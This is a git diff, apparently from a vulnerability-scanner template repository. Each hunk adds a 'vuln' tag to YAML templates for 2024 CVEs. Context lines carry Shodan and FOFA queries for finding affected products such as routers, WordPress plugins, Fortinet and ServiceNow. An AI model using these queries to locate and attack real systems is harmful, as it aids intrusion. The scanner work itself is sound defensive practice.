cve,cve2024,brother,mfc,printer,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-51978.yaml b/http/cves/2024/CVE-2024-51978.yaml index 898d2f3e87d..24948b1c0cb 100644 --- a/http/cves/2024/CVE-2024-51978.yaml +++ b/http/cves/2024/CVE-2024-51978.yaml @@ -21,7 +21,7 @@ info: metadata: fofa-query: app="brother-Printer" zoomeye-query: device="brother-Printer" || app="brother-Printer" - tags: cve,cve2024,brother,authenticated,default-login,vkev + tags: cve,cve2024,brother,authenticated,default-login,vkev,vuln # Flow: Extract serial → Generate password → Login attempt flow: | diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index fe1e68fe5ff..c7c0caa8c55 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -26,7 +26,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: cve,cve2024,servicenow,rce,kev,vkev + tags: cve,cve2024,servicenow,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index cc0bc0adf7e..7aa22ef4696 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"FleetCart" - tags: cve,cve2024,packetstorm,cms,fleetcart,info-leak + tags: cve,cve2024,packetstorm,cms,fleetcart,info-leak,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-52433.yaml b/http/cves/2024/CVE-2024-52433.yaml index 5e028c2f362..b0b0a9c15a6 100644 --- a/http/cves/2024/CVE-2024-52433.yaml +++ b/http/cves/2024/CVE-2024-52433.yaml @@ -25,7 +25,7 @@ info: vendor: mindstien product: my_geo_posts_free framework: wordpress - tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection + tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection,vuln variables: string: '{{rand_text_alpha(5)}}' diff --git a/http/cves/2024/CVE-2024-5276.yaml b/http/cves/2024/CVE-2024-5276.yaml index e2c2f41f2f3..4ab947460ad 100644 --- a/http/cves/2024/CVE-2024-5276.yaml +++ b/http/cves/2024/CVE-2024-5276.yaml @@ -22,7 +22,7 @@ info: max-request: 6 verified: true fofa-query: body="FileCatalyst file transfer solution, easily transfer large files" - tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli,vkev + tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli,vkev,vuln variables: ctxpath: "workflow" diff --git a/http/cves/2024/CVE-2024-52762.yaml b/http/cves/2024/CVE-2024-52762.yaml index dbe178c9a74..58d898be9d2 100644 --- a/http/cves/2024/CVE-2024-52762.yaml +++ b/http/cves/2024/CVE-2024-52762.yaml @@ -21,7 +21,7 @@ info: product: ganglia-web shodan-query: http.html:"ganglia_form.submit()" fofa-query: body="ganglia_form.submit()" - tags: cve,cve2024,ganglia,xss + tags: cve,cve2024,ganglia,xss,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-52763.yaml b/http/cves/2024/CVE-2024-52763.yaml index f42f92a027e..6c2806f89ba 100644 --- a/http/cves/2024/CVE-2024-52763.yaml +++ b/http/cves/2024/CVE-2024-52763.yaml @@ -21,7 +21,7 @@ info: product: ganglia-web shodan-query: http.html:"ganglia_form.submit()" fofa-query: body="ganglia_form.submit()" - tags: cve,cve2024,xss,ganglia,vkev + tags: cve,cve2024,xss,ganglia,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-52875.yaml b/http/cves/2024/CVE-2024-52875.yaml index 7457ca67334..00b26146097 100644 --- a/http/cves/2024/CVE-2024-52875.yaml +++ b/http/cves/2024/CVE-2024-52875.yaml @@ -19,7 +19,7 @@ info: max-request: 4 shodan-query: "Kerio Control" fofa-query: "Kerio Control" - tags: cve,cve2024,kerio,crlf,vkev + tags: cve,cve2024,kerio,crlf,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-5315.yaml b/http/cves/2024/CVE-2024-5315.yaml index e1d2bd88d1b..bbefb7d63b1 100644 --- a/http/cves/2024/CVE-2024-5315.yaml +++ b/http/cves/2024/CVE-2024-5315.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.title:"Dolibarr" product: dolibarr_erp\\/crm vendor: dolibarr - tags: cve,cve2024,dolibarr,erp,sqli,authenticated + tags: cve,cve2024,dolibarr,erp,sqli,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-5334.yaml b/http/cves/2024/CVE-2024-5334.yaml index eeb41be189a..5a574d19503 100644 --- a/http/cves/2024/CVE-2024-5334.yaml +++ b/http/cves/2024/CVE-2024-5334.yaml @@ -25,7 +25,7 @@ info: max-request: 1 shodan-query: title:"Devika AI" fofa-query: title="Devika AI" - tags: cve,cve2024,devika-ai,lfi,vkev + tags: cve,cve2024,devika-ai,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-53704.yaml b/http/cves/2024/CVE-2024-53704.yaml index 106fff8bc54..fadd3514304 100644 --- a/http/cves/2024/CVE-2024-53704.yaml +++ b/http/cves/2024/CVE-2024-53704.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: "http.html_hash:-1466805544" - tags: cve,cve2024,sonicwall,kev,vkev + tags: cve,cve2024,sonicwall,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-53991.yaml b/http/cves/2024/CVE-2024-53991.yaml index 1dfe9bd6a42..36218ccbeb5 100644 --- a/http/cves/2024/CVE-2024-53991.yaml +++ b/http/cves/2024/CVE-2024-53991.yaml @@ -20,7 +20,7 @@ info: epss-percentile: 0.96719 metadata: shodan-query: http.component:"Discourse" - tags: cve,cve2024,discourse,disclosure + tags: cve,cve2024,discourse,disclosure,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-5420.yaml b/http/cves/2024/CVE-2024-5420.yaml index a1fd2d51ce1..1691e2e19ba 100644 --- a/http/cves/2024/CVE-2024-5420.yaml +++ b/http/cves/2024/CVE-2024-5420.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: html:"utnserver Control Center" - tags: cve,cve2024,utnserver,seh,xss,seclists + tags: cve,cve2024,utnserver,seh,xss,seclists,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml index aae0598aafe..0dd697837f7 100644 --- a/http/cves/2024/CVE-2024-5421.yaml +++ b/http/cves/2024/CVE-2024-5421.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: "SEH HTTP Server" - tags: cve,cve2024,utnserver,seh,exposure + tags: cve,cve2024,utnserver,seh,exposure,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-54330.yaml b/http/cves/2024/CVE-2024-54330.yaml index 8906c3ef386..0315ed735ac 100644 --- a/http/cves/2024/CVE-2024-54330.yaml +++ b/http/cves/2024/CVE-2024-54330.yaml @@ -26,7 +26,7 @@ info: framework: wordpress fofa-query: body="wp-content/plugins/hurrakify" shodan-query: http.html:"wp-content/plugins/hurrakify" - tags: cve,cve2024,wordpress,wp-plugin,hurrakify,ssrf,oob,oast + tags: cve,cve2024,wordpress,wp-plugin,hurrakify,ssrf,oob,oast,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-54385.yaml b/http/cves/2024/CVE-2024-54385.yaml index 0c02cd7d3f7..89d5830de0a 100644 --- a/http/cves/2024/CVE-2024-54385.yaml +++ b/http/cves/2024/CVE-2024-54385.yaml @@ -26,7 +26,7 @@ info: framework: wordpress shodan-query: http.html:"/wp-content/plugins/radio-player" fofa-query: body="/wp-content/plugins/radio-player" - tags: cve,cve2024,wordpress,wp,wp-plugin,radio-player,ssrf + tags: cve,cve2024,wordpress,wp,wp-plugin,radio-player,ssrf,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-54763.yaml b/http/cves/2024/CVE-2024-54763.yaml index 1e6a7aa81c1..af32370fc36 100644 --- a/http/cves/2024/CVE-2024-54763.yaml +++ b/http/cves/2024/CVE-2024-54763.yaml @@ -23,7 +23,7 @@ info: product: A2004 shodan-query: http.title:"ipTIME" fofa-query: title="ipTIME" - tags: cve,cve2024,iptime,router,unauth,exposure,vkev + tags: cve,cve2024,iptime,router,unauth,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-54764.yaml b/http/cves/2024/CVE-2024-54764.yaml index 596bc5c172c..41d171c7735 100644 --- a/http/cves/2024/CVE-2024-54764.yaml +++ b/http/cves/2024/CVE-2024-54764.yaml @@ -23,7 +23,7 @@ info: product: A2004 shodan-query: http.title:"ipTIME" fofa-query: title="ipTIME" - tags: cve,cve2024,iptime,router,unauth,exposure,vkev + tags: cve,cve2024,iptime,router,unauth,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-54767.yaml b/http/cves/2024/CVE-2024-54767.yaml index 61a0463bde2..553a14e48f1 100644 --- a/http/cves/2024/CVE-2024-54767.yaml +++ b/http/cves/2024/CVE-2024-54767.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: body="FRITZ!Box 7530" - tags: cve,cve2024,fritz!box,info-leak,unauth + tags: cve,cve2024,fritz!box,info-leak,unauth,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-5488.yaml b/http/cves/2024/CVE-2024-5488.yaml index 6d436371d98..ee4b5e41e2e 100644 --- a/http/cves/2024/CVE-2024-5488.yaml +++ b/http/cves/2024/CVE-2024-5488.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true max-request: 3 - tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass + tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-55218.yaml b/http/cves/2024/CVE-2024-55218.yaml index 09970031d77..cb16e03e911 100644 --- a/http/cves/2024/CVE-2024-55218.yaml +++ b/http/cves/2024/CVE-2024-55218.yaml @@ -33,7 +33,7 @@ info: - intitle:"icewarp" - powered by icewarp 10.2.1 - powered by icewarp 10.4.4 - tags: cve,cve2024,icewarp,xss + tags: cve,cve2024,icewarp,xss,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml index d9ab56e8263..ac418e39dd2 100644 --- a/http/cves/2024/CVE-2024-5522.yaml +++ b/http/cves/2024/CVE-2024-5522.yaml @@ -23,7 +23,7 @@ info: publicwww-query: "/wp-content/plugins/html5-video-player" product: html5_video_player vendor: bplugins - tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player + tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player,vuln variables: num: "999999999" diff --git a/http/cves/2024/CVE-2024-55415.yaml b/http/cves/2024/CVE-2024-55415.yaml index caec04c3aca..87f50badbd2 100644 --- a/http/cves/2024/CVE-2024-55415.yaml +++ b/http/cves/2024/CVE-2024-55415.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 4 shodan-query: title:"Voyager" - tags: cve,cve2024,devdojo,voyager,lfr,lfi + tags: cve,cve2024,devdojo,voyager,lfr,lfi,vuln variables: username: "admin@admin.com" diff --git a/http/cves/2024/CVE-2024-55416.yaml b/http/cves/2024/CVE-2024-55416.yaml index 6f9918c8408..1ad6ca1c383 100644 --- a/http/cves/2024/CVE-2024-55416.yaml +++ b/http/cves/2024/CVE-2024-55416.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 4 shodan-query: title:"Voyager" - tags: cve,cve2024,devdojo,xss,authenticated + tags: cve,cve2024,devdojo,xss,authenticated,vuln variables: username: "admin@admin.com" diff --git a/http/cves/2024/CVE-2024-55417.yaml b/http/cves/2024/CVE-2024-55417.yaml index 830b4156d24..21ba9369ffd 100644 --- a/http/cves/2024/CVE-2024-55417.yaml +++ b/http/cves/2024/CVE-2024-55417.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 5 shodan-query: title:"Voyager" - tags: cve,cve2024,intrusive,devdojo,voyager,file-upload,authenticated + tags: cve,cve2024,intrusive,devdojo,voyager,file-upload,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) diff --git a/http/cves/2024/CVE-2024-55457.yaml b/http/cves/2024/CVE-2024-55457.yaml index 053f9afdaf9..0912147c037 100644 --- a/http/cves/2024/CVE-2024-55457.yaml +++ b/http/cves/2024/CVE-2024-55457.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"MasterSAM" - tags: cve,cve2024,lfi,mastersam,v11,adama,vkev + tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-55550.yaml b/http/cves/2024/CVE-2024-55550.yaml index c67ad94f940..d8483ab885b 100644 --- a/http/cves/2024/CVE-2024-55550.yaml +++ b/http/cves/2024/CVE-2024-55550.yaml @@ -22,7 +22,7 @@ info: product: cmg_suite shodan-query: http.html:"Mitel Networks" fofa-query: body="mitel networks" - tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev + tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-55591.yaml b/http/cves/2024/CVE-2024-55591.yaml index 9fc2f61cd24..e4cd531e093 100644 --- a/http/cves/2024/CVE-2024-55591.yaml +++ b/http/cves/2024/CVE-2024-55591.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: fortinet product: fortiproxy - tags: cve,cve2024,fortinet,disclosure,fortios,kev,intrusive,vkev + tags: cve,cve2024,fortinet,disclosure,fortios,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-55956.yaml b/http/cves/2024/CVE-2024-55956.yaml index 59168671475..9f4a3d40c65 100644 --- a/http/cves/2024/CVE-2024-55956.yaml +++ b/http/cves/2024/CVE-2024-55956.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 2 shodan-query: 'Server: Cleo' - tags: cve,cve2024,intrusive,cleo,file-upload,kev,vkev + tags: cve,cve2024,intrusive,cleo,file-upload,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-56145.yaml b/http/cves/2024/CVE-2024-56145.yaml index 3300ecb4482..31db01fe40b 100644 --- a/http/cves/2024/CVE-2024-56145.yaml +++ b/http/cves/2024/CVE-2024-56145.yaml @@ -37,7 +37,7 @@ info: - icon_hash=-47932290 - body=craftcms publicwww-query: craftcms - tags: cve,cve2024,rce,craftcms,ssti,kev,vkev + tags: cve,cve2024,rce,craftcms,ssti,kev,vkev,vuln variables: nonce: "{{rand_int(1000000000,9999999999)}}" diff --git a/http/cves/2024/CVE-2024-56325.yaml b/http/cves/2024/CVE-2024-56325.yaml index de71c6198c4..b53979692fc 100644 --- a/http/cves/2024/CVE-2024-56325.yaml +++ b/http/cves/2024/CVE-2024-56325.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1696974531 - tags: cve,cve2024,apache,pinot,auth-bypass + tags: cve,cve2024,apache,pinot,auth-bypass,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-56512.yaml b/http/cves/2024/CVE-2024-56512.yaml index ea44aa7bedb..f21ac28dce9 100644 --- a/http/cves/2024/CVE-2024-56512.yaml +++ b/http/cves/2024/CVE-2024-56512.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 shodan-query: title:"Nifi" - tags: cve,cve2024,nifi,exposure + tags: cve,cve2024,nifi,exposure,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-57045.yaml b/http/cves/2024/CVE-2024-57045.yaml index ecb49333158..80381f849a5 100644 --- a/http/cves/2024/CVE-2024-57045.yaml +++ b/http/cves/2024/CVE-2024-57045.yaml @@ -22,7 +22,7 @@ info: shodan-query: title:"D-Link" fofa-query: title="D-Link" vendor: D-Link - tags: cve,cve2024,dlink,disclosure,unauth + tags: cve,cve2024,dlink,disclosure,unauth,vuln http: diff --git a/http/cves/2024/CVE-2024-57046.yaml b/http/cves/2024/CVE-2024-57046.yaml index b1786e42408..b17da17a556 100644 --- a/http/cves/2024/CVE-2024-57046.yaml +++ b/http/cves/2024/CVE-2024-57046.yaml @@ -24,7 +24,7 @@ info: product: DGN2200 shodan-query: http.title:"DGN2200" fofa-query: title="NETGEAR DGN2200" - tags: cve,cve2024,netgear,router,auth-bypass,dgn2200 + tags: cve,cve2024,netgear,router,auth-bypass,dgn2200,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-57049.yaml b/http/cves/2024/CVE-2024-57049.yaml index 235af26d73c..bd1d57905b3 100644 --- a/http/cves/2024/CVE-2024-57049.yaml +++ b/http/cves/2024/CVE-2024-57049.yaml @@ -23,7 +23,7 @@ info: max-request: 1 verified: true fofa-query: body="Archer C20" - tags: cve,cve2024,tp-link,auth-bypass,archer-c20,vkev + tags: cve,cve2024,tp-link,auth-bypass,archer-c20,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-57050.yaml b/http/cves/2024/CVE-2024-57050.yaml index ce1ea0abf5b..335d83b14ca 100644 --- a/http/cves/2024/CVE-2024-57050.yaml +++ b/http/cves/2024/CVE-2024-57050.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 fofa-query: body="WR840N" - tags: cve,cve2024,tp-link,auth-bypass + tags: cve,cve2024,tp-link,auth-bypass,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-57514.yaml b/http/cves/2024/CVE-2024-57514.yaml index c920a33cc82..552ec0dcdda 100644 --- a/http/cves/2024/CVE-2024-57514.yaml +++ b/http/cves/2024/CVE-2024-57514.yaml @@ -20,7 +20,7 @@ info: max-request: 1 vendor: tp-link product: tp-link-archer-a20-v3-router - tags: cve,cve2024,tplink,router,xss + tags: cve,cve2024,tplink,router,xss,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-5765.yaml b/http/cves/2024/CVE-2024-5765.yaml index 25719020fdc..f65d593fa6f 100644 --- a/http/cves/2024/CVE-2024-5765.yaml +++ b/http/cves/2024/CVE-2024-5765.yaml @@ -19,7 +19,7 @@ info: max-request: 2 verified: true fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header" - tags: time-based-sqli,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth + tags: time-based-sqli,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-57727.yaml b/http/cves/2024/CVE-2024-57727.yaml index d68473bd2b3..5a7bcbdec74 100644 --- a/http/cves/2024/CVE-2024-57727.yaml +++ b/http/cves/2024/CVE-2024-57727.yaml @@ -23,7 +23,7 @@ info: vendor: simple-help product: simplehelp shodan-query: html:"SimpleHelp" - tags: cvec,cve2024,simplehelp,lfi,kev,vkev + tags: cvec,cve2024,simplehelp,lfi,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-58136.yaml b/http/cves/2024/CVE-2024-58136.yaml index a4664931eeb..5443585e044 100644 --- a/http/cves/2024/CVE-2024-58136.yaml +++ b/http/cves/2024/CVE-2024-58136.yaml @@ -24,7 +24,7 @@ info: product: yii fofa-query: title="Yii" shodan-query: title:"Yii" - tags: cve,cve2024,yii2,rce,php,framework,kev,vkev + tags: cve,cve2024,yii2,rce,php,framework,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5827.yaml b/http/cves/2024/CVE-2024-5827.yaml index b79cac38096..36e1170eca7 100644 --- a/http/cves/2024/CVE-2024-5827.yaml +++ b/http/cves/2024/CVE-2024-5827.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 2 fofa-query: body='vanna.ai' - tags: cve,cve2024,vanna,sqli,vkev + tags: cve,cve2024,vanna,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 199605b1d09..72496830d0c 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -22,7 +22,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev + tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-5932.yaml b/http/cves/2024/CVE-2024-5932.yaml index 96a3d8299d0..a909a9f37fc 100644 --- a/http/cves/2024/CVE-2024-5932.yaml +++ b/http/cves/2024/CVE-2024-5932.yaml @@ -32,7 +32,7 @@ info: product: givewp framework: wordpress publicwww-query: "/wp-content/plugins/give/" - tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp,vkev + tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-5936.yaml b/http/cves/2024/CVE-2024-5936.yaml index b85f1ddddb3..1fefc1d7e6f 100644 --- a/http/cves/2024/CVE-2024-5936.yaml +++ b/http/cves/2024/CVE-2024-5936.yaml @@ -22,7 +22,7 @@ info: max-request: 1 shodan-query: html:"private gpt" product: private-gpt - tags: cve2024,cve,private-gpt,redirect + tags: cve2024,cve,private-gpt,redirect,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-5947.yaml b/http/cves/2024/CVE-2024-5947.yaml index 51798a5ad5f..bd18b9eab3c 100644 --- a/http/cves/2024/CVE-2024-5947.yaml +++ b/http/cves/2024/CVE-2024-5947.yaml @@ -19,7 +19,7 @@ info: vendor: Deep Sea Electronics product: DSE855 fofa-query: "Deep Sea Electronics" - tags: packetstorm,cve,cve2024,bypass,info-leak + tags: packetstorm,cve,cve2024,bypass,info-leak,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5975.yaml b/http/cves/2024/CVE-2024-5975.yaml index 1d330d4be80..11e9492314b 100644 --- a/http/cves/2024/CVE-2024-5975.yaml +++ b/http/cves/2024/CVE-2024-5975.yaml @@ -21,7 +21,7 @@ info: product: cz-loan-management framework: wordpress publicwww-query: "/wp-content/plugins/cz-loan-management" - tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index 6f7bf30d619..a737df3cd15 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -24,7 +24,7 @@ info: publicwww-query: "/wp-content/plugins/quiz-maker/" product: quiz_maker vendor: ays-pro - tags: time-based-sqli,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli + tags: time-based-sqli,cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6049.yaml b/http/cves/2024/CVE-2024-6049.yaml index 2d954feae0e..5ba5afb13e5 100644 --- a/http/cves/2024/CVE-2024-6049.yaml +++ b/http/cves/2024/CVE-2024-6049.yaml @@ -21,7 +21,7 @@ info: epss-percentile: 0.98775 metadata: max-request: 2 - tags: cve,cve2024,lawo,vtimesync,lfi + tags: cve,cve2024,lawo,vtimesync,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6095.yaml b/http/cves/2024/CVE-2024-6095.yaml index 36f31e37494..40d727b62b7 100644 --- a/http/cves/2024/CVE-2024-6095.yaml +++ b/http/cves/2024/CVE-2024-6095.yaml @@ -24,7 +24,7 @@ info: vendor: mudler product: localai shodan-query: http.favicon.hash:-976853304 - tags: cve,cve2024,localai,mudler,lfi + tags: cve,cve2024,localai,mudler,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6159.yaml b/http/cves/2024/CVE-2024-6159.yaml index 5b5984b8895..19a303ee74c 100644 --- a/http/cves/2024/CVE-2024-6159.yaml +++ b/http/cves/2024/CVE-2024-6159.yaml @@ -20,7 +20,7 @@ info: max-request: 2 framework: wordpress publicwww-query: "/wp-content/plugins/push-notification-for-post-and-buddypress" - tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,push-notification + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,push-notification,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6188.yaml b/http/cves/2024/CVE-2024-6188.yaml index 7745bedc2e4..ea83ddd0884 100644 --- a/http/cves/2024/CVE-2024-6188.yaml +++ b/http/cves/2024/CVE-2024-6188.yaml @@ -20,7 +20,7 @@ info: max-request: 1 vendor: parsec-automation product: tracksys - tags: cve,cve2024,traksys,idor,info-leak,vkev + tags: cve,cve2024,traksys,idor,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 8d6d6ad1f7c..3a969e6452a 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -24,7 +24,7 @@ info: product: payplus-payment-gateway framework: wordpress publicwww-query: "/wp-content/plugins/payplus-payment-gateway" - tags: time-based-sqli,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment,vkev + tags: time-based-sqli,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6235.yaml b/http/cves/2024/CVE-2024-6235.yaml index 6062bd9e0b3..9937bc32da9 100644 --- a/http/cves/2024/CVE-2024-6235.yaml +++ b/http/cves/2024/CVE-2024-6235.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 shodan-query: title:"NetScaler Gateway" - tags: cve,cve2024,netscaler,exposure,vkev + tags: cve,cve2024,netscaler,exposure,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index 3356b77220c..21188455f63 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -21,7 +21,7 @@ info: product: wps_hide_login framework: wordpress publicwww-query: "/wp-content/plugins/wps-hide-login/" - tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml index f4f5aa75992..f3157198f7c 100644 --- a/http/cves/2024/CVE-2024-6366.yaml +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -19,7 +19,7 @@ info: product: user-profile-builder framework: wordpress publicwww-query: "/wp-content/plugins/profile-builder" - tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder + tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index 751b54e333a..b401d9dc8e4 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -20,7 +20,7 @@ info: fofa-query: icon_hash="-1047157256" product: aim vendor: aimstack - tags: cve,cve2024,aim,aimhubio,file-write,vkev + tags: cve,cve2024,aim,aimhubio,file-write,vkev,vuln variables: filename: "{{rand_base(7)}}" diff --git a/http/cves/2024/CVE-2024-6420.yaml b/http/cves/2024/CVE-2024-6420.yaml index 8873f59c74d..8b0d4e7d456 100644 --- a/http/cves/2024/CVE-2024-6420.yaml +++ b/http/cves/2024/CVE-2024-6420.yaml @@ -23,7 +23,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/hide-my-wp" publicwww-query: "/wp-content/plugins/hide-my-wp/" - tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp + tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6460.yaml b/http/cves/2024/CVE-2024-6460.yaml index 796f90bfb38..f345b8dbd39 100644 --- a/http/cves/2024/CVE-2024-6460.yaml +++ b/http/cves/2024/CVE-2024-6460.yaml @@ -21,7 +21,7 @@ info: vendor: WordPress product: tradedoubler-affiliate-tracker fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/" - tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker + tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6517.yaml b/http/cves/2024/CVE-2024-6517.yaml index b80323e5946..d6b73d10529 100644 --- a/http/cves/2024/CVE-2024-6517.yaml +++ b/http/cves/2024/CVE-2024-6517.yaml @@ -24,7 +24,7 @@ info: product: ds-cf7-math-captcha framework: wordpress publicwww-query: "/wp-content/plugins/ds-cf7-math-captcha" - tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha + tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha,vuln flow: http(1) && http(2) diff --git 